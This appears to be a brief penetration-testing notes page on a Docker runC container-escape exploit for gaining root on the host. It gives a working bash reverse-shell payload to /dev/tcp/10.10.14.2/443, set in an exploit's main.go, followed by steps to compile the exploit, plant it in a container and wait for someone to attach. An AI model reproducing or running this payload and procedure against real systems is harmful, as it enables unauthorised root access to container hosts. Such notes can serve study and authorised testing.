5 privesc docker runC exploit
Last updated
Last updated
Using
The vulnerability allows a malicious container to overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command.
Update payload in the main.go
;
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.2/443 0>&1"
compile it with go build main.go.
Move that binary to the container you'd like to escape from.
Execute the binary, and then the next time someone attaches to it and calls /bin/sh your payload will fire.